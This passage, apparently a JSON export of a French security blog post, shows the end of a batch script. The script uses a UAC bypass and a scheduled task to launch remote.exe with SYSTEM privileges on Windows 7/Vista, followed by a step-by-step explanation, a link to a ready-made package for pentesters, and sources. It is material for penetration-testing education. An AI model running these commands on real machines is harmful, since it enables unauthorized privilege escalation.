\/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n%BYPASSUACPATH% \/c schtasks \/run \/tn RemoteAsSystem&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\nping 127.0.0.1 -n 2 &amp;amp;amp;amp;amp;amp;gt; NUL&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n%REMOTEPATH% \/c %COMPUTERNAME% SYSCMD&amp;amp;amp;amp;amp;lt;\/p&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n&amp;amp;amp;amp;amp;lt;p&amp;amp;amp;amp;amp;gt;[\/bash]<\/p>\n<p>Le principe de fonctionnement est le suivant :<\/p>\n<ul>\n<li>Le chemin d&#8217;acc\u00e8s au binaire &#8220;bypassuac.exe&#8221; est \u00e0 d\u00e9finir dans une variable.<\/li>\n<li>Le chemin d&#8217;acc\u00e8s au binaire &#8220;remote.exe&#8221; est \u00e0 d\u00e9finir dans une variable.<\/li>\n<li>Le chemin d&#8217;acc\u00e8s au fichier XML &#8220;schtasks.xml&#8221; est \u00e0 d\u00e9finir dans une variable.<\/li>\n<li>Le script supprime toute ancienne t\u00e2che planifi\u00e9e nomm\u00e9e &#8220;RemoteAsSystem&#8221; en bypassant l&#8217;UAC.<\/li>\n<li>Le script cr\u00e9e une nouvelle t\u00e2che planifi\u00e9e &#8220;RemoteAsSystem&#8221; en chargeant ses propri\u00e9t\u00e9s \u00e0 partir du fichier XML pr\u00e9d\u00e9fini.<\/li>\n<li>La t\u00e2che planifi\u00e9e cr\u00e9\u00e9e est d\u00e9clench\u00e9e manuellement en bypassant l&#8217;UAC.<\/li>\n<li>Un temps d&#8217;attente de 2 secondes est r\u00e9alis\u00e9.<\/li>\n<li>Enfin, &#8220;remote.exe&#8221; est utilis\u00e9 sous son mode &#8220;client&#8221; pour se connecter localement via le nom Netbios de la machine au serveur qui dispose des privil\u00e8ges SYSTEM.<\/li>\n<\/ul>\n<p>L&#8217;ex\u00e9cution de ce script donne le r\u00e9sultat suivant :<\/p>\n<div id=\"attachment_1031\" style=\"width: 310px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/www.asafety.fr\/wp-content\/uploads\/schtasks1.png\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-1031\" class=\"size-medium wp-image-1031\" alt=\"Escalade de privil\u00e8ge via schtasks\" src=\"https:\/\/www.asafety.fr\/wp-content\/uploads\/schtasks1-300x131.png\" width=\"300\" height=\"131\" srcset=\"https:\/\/www.asafety.fr\/wp-content\/uploads\/schtasks1-300x131.png 300w, https:\/\/www.asafety.fr\/wp-content\/uploads\/schtasks1.png 670w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-1031\" class=\"wp-caption-text\">Escalade de privil\u00e8ge via schtasks<\/p><\/div>\n<p>L&#8217;ensemble des binaires, outils et script ont \u00e9t\u00e9 centralis\u00e9s dans le package\u00a0<a href=\"https:\/\/www.asafety.fr\/wp-content\/uploads\/Win7_Local-Privilege-Escalation_SCHTASKS_BypassUAC.zip\">Win7_Local-Privilege-Escalation_SCHTASKS_BypassUAC<\/a>\u00a0afin de faire gagner du temps aux pentesteurs.<\/p>\n<p>Cette m\u00e9thode n\u2019est pas nouvelle et est \u00e0 consid\u00e9rer comme une \u00e9volution de la technique via AT avec le nouveau binaire SCHTASKS. Elle a \u00e9t\u00e9 trait\u00e9e en 2008 sur le <a title=\"TechNet\" href=\"https:\/\/blogs.technet.com\/b\/askds\/archive\/2008\/10\/22\/getting-a-cmd-prompt-as-system-in-windows-vista-and-windows-server-2008.aspx?Redirected=true\" target=\"_blank\">blog TechNet de Microsoft<\/a>. ASafety la fait suivre ici en fournissant un script Batch automatis\u00e9 et un package pr\u00eat \u00e0 l\u2019emploi.<\/p>\n<p><strong>Sources &amp; ressources :<\/strong><\/p>\n<ul>\n<li><a title=\"[Windows XP] Escalade de privil\u00e8ge via les t\u00e2ches planifi\u00e9es\" href=\"https:\/\/www.asafety.fr\/vuln-exploit-poc\/windows-xp-escalade-locale-de-privilege-via-les-taches-planifiees-at\/\" target=\"_blank\">ASafety &#8211; Privil\u00e8ge escalation via AT du temps de Windows XP<\/a><\/li>\n<li><a title=\"Escalade de privil\u00e8ge via AT sur les Windows r\u00e9cents\" href=\"https:\/\/www.asafety.fr\/vuln-exploit-poc\/windows-vista7-escalade-de-privilege-via-at-et-bypass-uac\/\" target=\"_blank\">ASafety &#8211; Privil\u00e8ge escalation via AT sur les Windows r\u00e9cents<\/a><\/li>\n<li><a title=\"BypassUAC\" href=\"https:\/\/www.trustedsec.com\/downloads\/tools-download\/\" target=\"_blank\">BypassUAC &#8211; TrustedSEC<\/a><\/li>\n<li><a title=\"TechNet\" href=\"https:\/\/blogs.technet.com\/b\/askds\/archive\/2008\/10\/22\/getting-a-cmd-prompt-as-system-in-windows-vista-and-windows-server-2008.aspx?Redirected=true\" target=\"_blank\">Getting a CMD prompt as SYSTEM in Windows Vista and Windows Server 2008 &#8211; TechNet<\/a><\/li>\n<li><a title=\"Windows Debugger Tools\" href=\"http:\/\/msdn.microsoft.com\/en-US\/windows\/hardware\/gg463009\/\" target=\"_blank\">Debugging Tools for Windows<\/a><\/li>\n<\/ul>\n<p><\/p>","protected":false},"excerpt":{"rendered":"<p>Il y a quelques jours ASafety vous communiquait la technique d&#8217;escalade de privil\u00e8ge SYSTEM sur les environnements Windows r\u00e9cents avec [&hellip;]<\/p>\n","protected":false},"author":1337,"featured_media":1213,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[59,165,529,14,167],"tags":[28,369,33,27,31,36,370,371,367,34,32,30,373,118,372,368,374],"class_list":["post-1030","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-administration-reseaux-et-systemes","category-os","category-privilege-escalation","category-vuln-exploit-poc","category-windows","tag-at","tag-bypass-uac","tag-cmd-exe","tag-lpe","tag-nt-authority","tag-planified-task","tag-remote-exe","tag-remotex64-exe","tag-schtasks","tag-shell","tag-system","tag-taches-planifiees","tag-user-account-control","tag-windows-7","tag-windows-debugger-tools","tag-windows-vista","tag-xml"],"_links":{"self":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/1030","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/users\/1337"}],"replies":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/comments?post=1030"}],"version-history":[{"count":13,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/1030\/revisions"}],"predecessor-version":[{"id":2228,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/1030\/revisions\/2228"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/media\/1213"}],"wp:attachment":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/media?parent=1030"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/categories?post=1030"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/tags?post=1030"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}